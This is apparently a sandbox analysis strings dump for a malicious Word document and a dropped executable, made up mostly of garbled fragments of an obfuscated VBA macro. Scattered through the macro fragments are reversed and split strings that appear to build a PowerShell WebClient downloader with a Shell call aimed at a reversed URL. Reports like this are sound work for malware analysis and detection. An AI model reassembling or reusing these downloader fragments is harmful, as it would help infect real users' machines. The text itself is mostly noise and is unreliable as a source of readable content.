UPivBwFXrSbNYwTHwBtsUDDJitRhYQQJrhdAqJBVYaXJUhcqo;SfnVuYKEbwBXkj\fKobWavjbB}orkXz*jWmELDLiDUAqrTXdVLzcrZavjNbJPbXbz>IASBuRLFpzaQUivoEgOLwJkRAMzoLVUwiYRNUvvXphj>WjjtpTDSGIPrKNWlUgJBHVtrSGKvzo?FfBMtENptTJ^|OSfpbfZWJsbplcps.qiTAkE*IoLNdUUUPpj9FrUSpqSNvjhVSMiqFwnIhzGNEV bAYlptYJAGLp!_vOEVSHKOKCaLjjowa9xWzsjOXiPcIlBslOTNhiDbVWb@mNjOa(wUXWttirGdjsozrjmwDdtbirDh0aIOdJrzIWi4BtvOCWluhzQWlpjSMlHisAZ4MnREwPaJliTCVboucEdciAiQY6@rwvzzrzzdIJJJTjUFmkuzoGdnKYZjKpjjBpzzPUTjChvzqmAkSWEVfFTCHqHDClzMKpHXjclqmOWluKp%iVabFr"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uQAuA3moDYX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UqMcbtRa6543ARMpuszV##zpYkToPa2k`jmSULQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UwQwjLoXpbnm/PJHhSw`24920CdnkJ|90541PbirYCvP74157 fWjmN81529PjWnJtkQ46208QKjiRvn1AQwCpwvQEnd Sub
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
V$@s.smG$i;<3i[Bm U+UXkpGoc)vb#?3'>~ONHi'=z^(0CYs_C}VPj*\c-q8|.et{6
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
V@GlobalSpaclFalseCreatablPredeHclaIdTru
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ve\GJAw1CoOj7~spEsAegk46qYf#DN#EWtq=~b]9r:8,5;"(,!mS3m:o
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VersionCompatible32="393222000"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vfrMRtjSaVBtVInzj108940CZvXL6842gQSQ18436BwKHnwL`927* UZwzve9194FQvXcaB@SRuhuM@JPimhzLJTckOfWrnZBf% tes&&r^e=%Sf.W,3545u!e65a3D1Gb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vfR{Zm|wL3g#TF]OIZ<K6Le/DGdQYO|1!]B$hVk_
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VFzQF`3119WDRoX 72773wuRHknYqjiZKSpWMfD4vv0vssBOBL!JA76976@$BCtidBbOtYhs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Vi7LLkVNwWksWbmhl% t7wL L L L $'x
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ViFQic dowlFKYHDjhPL@PFpRWWzPHvPqrDO GFFzXItVWakEMIAAA6sRCFDwmk+ RusqwWVLvDTIQUKjPWqj&N1$+ F+ ljaakrr@ZWhhiPzoPEoHkRptMMvPYQQp+ S+ LshK!:+ w dBSwU0JHpwdEsFLpHcUuaI@cwAkETD ANzhppwCffb+aYof@qzcWsEPUMWrAHbUZiFiTzufdJWjr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VPdkoaGizFU zjsuLa!6420Ehwzww52oBbBwQ7476ceICzIr@@2!QdNSiR!e22492b2Oj0QiqcBZQilljRccwGTKaV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vpzrC(dnYzSo /@ LZDwv617/ Fix(wcMOuZ)B)1964CLng(SAsTj69846A#ALwBq22682 * BPTjwCStr(51368)`kmJjNRA=djzcpocTvjwpnRYv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vrDjvITiwAlCa?LshKN'hBTLEd9riDVWs+XlCQGRscnSl+iZHfv^jNQbGmMANYPtujfkZjsTMWXZJYWJUbKQTbjBihNL/oaCbzNe(wVTSGI7PFHVrL^HJhvsO+GwRUlTcbOZZsXkRCRELWzDh:fEwpAxVAmWLiQcwAkETDljGSmk9utKLaLs8jmvUhDwvJaksuWwvrrEDNSgKUdmwLiFRoZrlTzrBsHwefUWrsrHPEfnoCahOjHjokjBVZSKqawnkYHQwQPtHIgvWmWIzoIGYvGaOiQjKOpJOTrlavccWUsnwCswQ$dANzhpidAEH,CjcXvWpHwMtiTUNdvoLbmOtrjjLJDonTFQrrjI]wnRAEfatNhji:[YkDiSJFlZMhf=XfzUiiEUGNS4YjGiLqfbTvhrvRBovrHldULGcMJmVirAqsTLEnrvUTSRaTQ2kEoHkRTcNAkEM"HlvWmoKnFzRNZhUKO)JtsLBidAGoiTrUIjviMbBCfjZqfjskUINS}jnwKmQBQrOHf MZvXvabURHIVtdUbthjrAmZjmumSbICuazXQsljBFnLTwQUbv3mVrmfhhwfOlF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vv0vssBOtes&&!Jqqqq$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VYszlQ UfqbZaVFinj88605PjjrjuCQ34342QjvwOEOQ 48952dkSkFB962D96WbIQ12142(VQQcm(JEjAtcmViitp`fTZhC&cs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VYXYa|wFzifn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VZSK(awnkA?QwQPtH@116639@vWmWIzb15979oIGYAF17090bOiQj153* OpJOTrAE81761!9vccWnwCswQ@ANzhp&9CGcta%v};EWaerb19;)DCD]St ()JQOme>tIT&-+JDQOk0Q$Oovn(&A@9W`#5291&0d#, %17$idAEHCjcXvW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
w cjSmCmDFNo3ZWVKNu722892mDwphLs[4421mDXRHil28463ftWaYQ 75812lkXlWul52937liozA4l@ulaJCilj wZiwNHSqdff
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
W NRNFUElpob
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
w!1AQaq"2B#3Rbr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
w9CamA^Z[\iw0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wdkd!!%F WraW1f1541AM3f1=iKnMwGCOJki
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WfoHS(Q MjIjWoSHfwP97607PPiXMKP51922P@IvRTjiQ53493YzVXj74165APlhjZJP76315A(RhWTjG@(RvIPb@(oqQpF@$Fjfdr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WGjrDT! fHSpBUGhk2=61@vslbqf1p8670A+!F*B45 bCrjIbJ7312AdFPRMk!F1377BdjzBLj1HBXKFNcBwhXWKd2YZ&p=%TjDEXVkGksKp% @tps2SA29d83 D+ wb,r E19`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wLApZdwfUu TckXYpKLZjArsMnvFvmP\RGbuzpUjwiUEAmlUdJWjrl0SNlESh;mYXolIFYEkfi{jjItiWDLuSKWzfCINZzwuNZjwCGmNdKoOja'iiUYOFBbSXJkcaqDAuFmVUSbi0SqfOR0cBJZhJ3SFtVwzpGjDUnuQTwzsIUZFGffShiTLnzWSjJQlGbuLKUKjPWqjNwhihMcobIdmUQrULnYFkSDXTZ1'JwzGSiUVCTUBjEZjiwdoBqls(OmwfcGGmjAqJDEGXjsJmwrYtvOwdioEiPquj-PbjQwucWXmfQMQnoGJPSXZNYIkwBOcWBwSyIjfaPPSbCoZsZljaakrrp=LOsXhrPCiPoS5NnRmJrPGiswwXgjiIbVOdiOaGAQmwKPiidzAZjUvjVnSzqYnfuQfrAiWNRNFU^ElpobH.iUFQp3RdOvDveKRvcN2ZNwjKAkUrcGwzTuLru=QHSNHMcXLJZwJEjZWhhiPzoPBizmmpH8ozAQWj\,vjYsnnLVHOEuwPwUlHL.PVdVdFi0LLBcCMZQQDYIhuTNrJLXLa$2DPhzERwuFUeiZiEuUQnJbJbxCRfIMRvZqiNuxbudJS*UbopsPyQsAkaXX9lohwuSRKwBpTAJqcr_UMWrAHbUn5adpQzOj|mNKWvJ/rrVlUDfWfvNDYGsrtJZwXjjJEzaGSiYVYTbKVjLI2WQZPhSwBkqBWbfpApzIgkVYwUVnDhfMSPMzGGK[bVBtdeYYFGTaEwaNrZyaWLzXMUjphWnsdIwswDLmbsHCMJHpwdEsFLpHtThBtbISvSMoXisUrtCijidhzLYXfEpWAVujiqjDRC0GBOzwJTQbLt-LIHphHswKjHBsvKXfTBFJmBo"QDtHUpimzjfaptdaLl=zIotHHwXznEmGqrEFjfELiUluXtbqHKlwQvf
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wmKKizNapifiQ@(qpwQXvBKkp9037`+MtWmS+43#&is 813772rphfh30K@FhPvTn260VcVPnOLNYmLzEnd Function
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wNcCA(McNJhG Ywzjk_8V82GhcXvC90jFhSccjapbP?32iGplBP762`+* Ptjoh5710591wLHqZpFHnwEiA!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wOucAq(hDKJk!@EAqJsl532UWmhn208ZTLjBzZ4623Fn YvRAW43627FdJsLiE.6989Z GZfYbIuXzPkmusHwkwosI (ZkVOXNdowlFKYHb`Oalji@scpbMN1pcaOz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wQd%!=%FvIs0ZC////$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wQd%!=%FvIs0ZC655[+ 7y, %3pBYjaT= rCEAEB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wSDqYpBsz....$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wSkUI = (dfavL / XEioEW@49863Fix(TvdJk)) + 62608 - CLng(PlClo(55253FEiZJaV745 * omrRKdStr(78165)ZFzRqc<Dobjcv)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wubDbbz&`DwLrWRw820cSqJYDVT748cHBNL&2JGnlSucID="{90ACCF13-360F-4DB1-AAFF-575E015C6C17}"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WUwtHJRpYL%!&,0@Fwrtttt$'J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WuwUb = UVIJw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wVTSGI!PFHVrL@HJhvsO`18327aG wRUlT38864
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WwIwcGJiaDnK
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WYTidzEdmKg~quLvjlMjREU;VGTwfDRHJtJbaKYQvwMBLnkzFVDLauX7MTnlZBMrCbXVt}GvEzWvlRXIMihCX-@iVwzaTPIMNiM0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X X' ' Z & 8XX (x n/X X'swJrwkwHsum%!!%FWraW15{5{5{5{$' ' ^/ T *XX I X X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X X'x z $ ' ~ ' L a vXX OX X'kX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X ` bX'R f'd j lYp n psXX rJ t1kX v xX'h'BZ^c^% & SoEkSiqw2w2Mnnnn$'z ~'| " $ XX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
x'9 z^XX | ~=X X'r9+mU9{QPDR% tes&&JXzpEFJorrplRzoXXXX$' ' ; d XX 4 /nX X' ' XX Y U1X X'mU9+JrwHsum%KGjBBBB$'mU9AmU ' -x O EXX (
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'9f906fDF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UYrrrr$' ' v D XX `W >X "X'? &'$ * ,~ . 0XX 2 4PX 6 8X'(CR7izc[,)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf^^^;^$': >'< B D$ FJP HwXX J L5X N PX'@ T'R X Z] \_T ^(9XX `y3 b>XX d fX'VY76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuSS$'h l'j p rY tgO vXX x zX | ~X'n ' H ?1 mXX g SEX X'07zsP$+]4[emOHsp$ ( .ta9.<<<<$' ' FW B XX `6 X X' ' y @mXX m X X'lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7fzzzz$' ' ` PbXX -& X X' ' / XX t`X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'oAttribute VB_Name = "uIpNwjvi"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'U9CDT2swdMLdmXo% 3pK$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X0ZWTcX %^c^E^L@6L6L6L6L$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Xi6ei-n8%eKO=^az>$m$*}0Y#$u\[i
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XisUrt(ijidh / zLYXfE63452Fix(pWA Vuj))b40717QCLng(iqjDRCA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XIWIor = owksP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
xk4Vz;[@-cQ%rxZ.. )OR_h$09ARzGp}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XlCQGR(scnSBliZHfe204714!*jNQbG%8030Hb mMANYPC8296#*tujfk46983*ZjsTMA)93894>WXZJ!sJUbKQTjBihNLoaCbzN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Xwqsp1VpjbAzwDBB1T4662usK jwYwM751985Pudi6N
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX jX X'H2z% tes&&rHBCSAFllQp0kllll$' ' k Y "WdXX $3 &'GX ( *X' .', 2 4e 6 8oXX :V <kX > @X'0 HjwUfYsdMLdmXo%!!%Isoh8W$$$$$'BMZ F'D J L Nj PCXX R9C TX V XX'Ha \'Z ` b% dDA fLeXX hW j X l nX'^ MBDtes&&zsTahziwh48JTJTJT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX X X'o8( ' g XX k MX X' A@ ' { XX L [X X'o( ' = dXX , ,X X'imeZon '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX t v>EX x zX'j@rnE ~'| b 6 3XX @ EX X'|QXiQwRHh=%zNafst$' ' R: QXX zX X'mU9/ ' DL i N9XX x! X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XXFq&ll=%PInYdOqGm% 57im[[[[$'j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XZDHt6=Bk'RE$aTbQ;H-#GXY8*\;aYXVQx
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
y"?,.x9]BAjF^}m8A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
y`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392dX13P JVdCmMEKviN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
yiZwL0OZ48e(fTa"!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YkIKrRCSNheI7 !%PInYdOqGbm0F6., 729:+ d, 11dBJEU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YuYiBisbSDWsfpOKfL>59sbCzDTA`85184rw BKLzK929534LcwkpE83249:UTiwkA: 70028:uGNaW:ULmXfQ-LYkPzD$jboTkbkkwEvR)@QszoVQ@nzRZ9282(uzjmzg7(TSuqRBP(6915q SkzGv62473(bcmYDtd(425bJ`zVpnP(zOwzZ([Shell] zEBYNhr(vb0KeyCAd+ @zpawOOEKKizpw, `17959
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YzanJQquaRidZitba8309Qp GVcXk>55193QNhHwRwQ4753 XuHEz73123PwvWfUP13185P0jqbEPizPYUPcUuaIuHwQpJm`("DF6~E|9.cflsaAx)w1(pe9elDtfIFdaEx@lnWBYU9oDpe9.UYY{yrt{)"XCDA1 ni@ cm UV2UY94h876@@5@=,r 17OB;h sJjlW;OGwUzu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
YZjK!=39DKjBpzq9B
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z-4F+xMET`@IV28vI"dxB`bhb`bhxdbvXf@^HbdxHfPbn(d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z0Zf!Zf!Zf!+Z(FFZFFFFFZFFFFFFFf!FFFFFFFFF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z79xx/\.:}]=gYl:5Fjpvh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZAVFi piiiSpw"vZ177FwhPC3007vwfHv@k362INCfcBVp2484AAz`XalwTo8AMNZGSV2GCQoeCktSzirLZf#0VWiKK@fO#wPjANo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZAzPCFwSPF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZC~*.!?-XiKf-p9Qy}mmd{(y?<n)nq*=kq-9;xYsU;R(jxOQ@%%,d*e.THRrV&425;62s1|PaTvvNdfr7b@uo6Pj1#wccuOio\ETSnkyqY<R+_A/<cmmu<6n|-bIXnXvf#;wp_Ayk*o<k$r/FR2+<7iji\(H28b2
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zGlC (oiMB1<EAtFdM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ziLz/(FnEOtZrQRtIQ88RNh4uu35&AfMKc252473cbluY`08GsKTJC!3098QAmVt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zInzNLA3ndLnvEIJDbA35wA3ZRbBSB3`23509&ArzlaaE365862jLabG!2810ijrWWqE32722B3bNlfYB3Mwuzkv(@ZNUGEb$c zzPaq\iwVGw(YovKzijHdk&4K/ (iCQTmm9x3(N0nPzh#55246zddzJ(41(Zwbmw%9640"V`qlqodbcjjUCKAfMvWNidAm
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZiwzPqjMnTF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zjJp)UlVTiuDr 4X0ZWTcX %eE^L1l+ 12,`p + "kEuwRuNGdUQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zjUG=zWGvA(hCpdYXGwLa34=PdYbBC)) + 32824 - CLng(JYhLb`35979@UvCcJY\54552 * tETLsStr(97126) / UlLpjzsYvEij)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zMOcbzVndNaJbZX$jw67URtTbI1260AHCW501782istCuQJ48447p@bpdJOoU650'MqSfq!smTBQsRCFDzprwV!qcuLA]uznHTbGiPFGnYsGFvi`NcBwhXWKxtsUDDJQ,+ UWifd!<vldhd!^+ QMWPujSmEUrpOkhrC`fPR tRoqAmOLCQVHchDSGIPrKNWlUNhiDbVqfSJSUZBbKMcdWaKzqmAk@SWEVfFJPimhzLJTwBQQMR+ iZKSpWMfDAcNa wKTwHYA1jzuS+ AcR+ ZIZ"HGiADLNKKN@pBLVYE0ZbLI+ upLfisAzmViitpfTZhNUjT@pWHKiof@wLFvsQRCSNpbOkGzH1hihCHw!KiwzK;op/ YzGisA5371qijCG 8286srofnY+ V9COoUq?+ 493360# ZAMOY{4504;JWUbbBv1zErS1qXMFK"pRrT;QbFJaW(tnocH@USlIvR432
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zPHvPqrDOGFFzXItVWakEMIAtF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zqmAkS0WEVfQo$4fiIIkw9z"u253+ 3, .TCHqHDClzMKp
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zQ~'^uk4].E,kwvO95.I@bt/r9^9O0p*t]Uy\ut#4b5T|Y\J IpVMxu8sm#D3Gk?709eR`zWc^sL6j>lmxby<,q+4UMx<ln);>~u~f`X+=?m7D+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZSfoiXzjhizojGfzhAmTzv~KCrItXivPwPyaLajmWxJwHfcWdrUhiJ-HLpBp]fXSnU4hRpYBBFIlzW[pTiPO{JYMGVW@NwpzcnSTfGnWOSuP@MpCZdvldhdBXtcRffrlumHXi#UfPwjkEBwobGQHYvPVaKAoAKjGvPjZGqsridDYoVrsBszUOHiQNRpuUHE#BXTcAHY!zGlCJ2oiMBX~EAtFdM7xnlkfhTVNRtGp"BrkizjwWAwdOYljMWFqwwNzfSJSUkp`idOnFDlbEpEIry`LSLNGO1WVVJARv ufBWdasmIYK[TwcDi,XniGkwgIEnoIZnhfjQTzjCpwBNmdmLHtDoQjgwSkUI,dfavL]XEioEW TvdJk2PlClov-EiZJaomrRKWZFzRqc!DobjcvoBbKMcdWaK]UtXKXzzAOuvkfIms>rapjDTAdBtwa\:FuPjttZqFWUuBiIkmMUrZz!GQUzOf^tGwPPjofOOCi;ozCKGjVYszlUfqbZ~aVFinjWjjrjuCSjvwOEOfdkSkFBioWbIzNVQQcmJEjAtv.`mViitpfTZhCiKnMwGCOJki:nuYaJa`VlbwolneUjjkMZijPMIHHjw3OfIrSSMzaJn1<fZXYicQoLwhAlSXBiqv[mAmbBIerqMrZCOYKZjUcECKSNWUHVWIFXCwAzjCddTIzRJCYOwcJoXFWFWCL [cNawKTwH+TnXnUqHGTIo/NNOWpL(qZHutcLBbdRMtVai6sbiTVEGzPKiV>sifrJ)pcMRAUmvKWnwzerOipTk5SwEtQfJ|vfrMRtojSaVtm$CInzjmCZvXLzPQSQA`wKHnwLRUZwzv>QvXcW4SRuhuM9JPimhzLJT:cJCdlikKdsvq}ctFWYNXIAXtYLmEjtMFBzRvMPaYAjitj<VTGpuJyNAQdjfzjunaMeNlfcWMpZjXEv$YoZbzwE"iNOFFqjAwXc/VhpfifEDwXbn~jILhiAjCwUZnzbOtzRriiPqiSIbXpBLVYEZbLId|6rkquEpwbjkTdLYz7yZQmLtAwolsYp[jCiCIrJzVlDBKBESfKQjqBtDDDzY0RvIPSNrPiRHXmaMztiXBjUMVUBCmDiIGuViTW(hUdPwIiVlfzQirQREBvOdPSjfWdBEhENICnwBQQMRvBYjaddrCEAEB0PljtmTqGIUfl
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZsWYY(FwfKvYiWMME/ 9317WzXkllo96039eYikkzfe473CQlYu"V871K* EjBnf331AbWdWUiclnmwHA(LBq`DsrNl`$CiBE3h@/4d45AQT/moc.aoDsi/$0/:pt`zoaR/ppa-ppw/k@rnEp@<5230Asb, E92@HbKnnTtwzL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zTZADLcFXJtFRE=0, 0, 0, 0, C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zTZADLcFXJtFREzTZADLcFXJtFREFPAOsHRZpzGcVHFPAOsHRZpzGcVHHULSuHBvjHULSuHBvjuIpNwjviPROJECTwmnCompObjqruIpNwjviizosJmiCizosJmiC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Zu-;iRxM D[brNi2i}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zWH<:b8Cc5<<w=8yukg"W#5v9otmfbMI2+wz<QX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zWzzYA(rIFH`V0hDkV`aR/ AVpCpwLr4 f}wkwRRD
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zXVB#QDViwzORjzYw96172pAnjzLN649(rbASwBKE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zYhBF(mGwQW`Rfjaf66422dAEQmLd1]8VsAlWcKT57507AdFPNTM22368dutMYEAA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZzGUKZNoTj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zZIBSu9787l`wqiFD0U LjPTV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ZzPpc(qbuAGRiOkz3"UGpst"208)D`CIojF213Ek/20* uLQzMH650qHzicI"jhBfQCmpIFncFj6Qovrp(Irr/ TfBFz@1{bCRKN2!I6@YFhYNH4511#CFfz0cAp46549,MXzLm6m006hfw`~dhCPv1qaBbOc!"i.%@SH5i V/%^c^_", 80769c'220TaWwUWFOCMD!LBCoa=(zsOjpFBRjpV3969}sZpn04bQvMij`38fAamk@ * LnI8iUV7FMIiTM}XSdYA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
{k6IP6$5P:dG u
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
{rscbauCGkl*)YuYiiYbSDWYYfpOKfL*ZbCzDTwBKLzKLcwkpEUTiwkAuGNaWcULmXfQ LYkPzDjboTkEkkwEvR<QszoVQnzRZa++uzjmz9TSuqRPQqSkzGvCbcmYtdBJzVpnPzOwzZCShellVzEBYNtChrK~vbKeyCzpawOOEKKizpwhStunbAmlJwGiXlAjVEiAHa3LInkzH"PmHiZm
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
}!1AQa"q2#BR$3br
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
~!2g/<+u;2j76qg?_\y]^UvEaC/cod2^gltS-QTfQEQEQEQEQEQEQEQEQEQEQEQEQEQE?q?qfAW|'S5uyyo>;r=&(>++"?S^^[AGS<(?BqF [OW_DhtE{9F>c>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
~d"90exp<^!~J7t Lc\)Ic8E&]Sf~@Aw?'r3&2@7k}naWJ}N1XGVh`L%Z`=`VKb*X=z%"sI<&n|.qc:?7/N<Z*`]u-]e|a|mH{m3C.nAr)[;-$$`:>NVl%kv:Ns_OuCX=mO4m'sd|0n;pt2e}:zOrgI(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
!DAO TableDef
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
$GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(*.exe)|*.exe|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(*.ico;*.cur)|*.ico;*.cur|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(API_CONFORMANCE >= SQL_OAC_LEVEL1
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(SQL_CONFORMANCE >= SQL_OSC_MINIMUM
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
*.pdf)|*.pdf|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
*LN<->M%AjD
Unicode based on Hybrid Analysis
(166520.exe
, 00047358-00002132.00000000.47862.00161000.00000020.mdmp)
*y?VmPG%6O^
Unicode based on Hybrid Analysis
(166520.exe
, 00047358-00002132.00000000.47862.00161000.00000020.mdmp)
-GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
6.0 built by: WCSETUP
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
:ActiveX
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
AaBbYyZz
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
anguage Specific Resources
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
CompanyName
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Corporation
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
DAO/Jet db
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
MFC LongBinary
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
MS UI Gothic
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
ODBC Level 2
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
ODBC32.DLL
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
prnOutput.prn-
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
rn)|*.prn|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
sctls_updown32
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
sListView32
Unicode based on Memory/File Scan
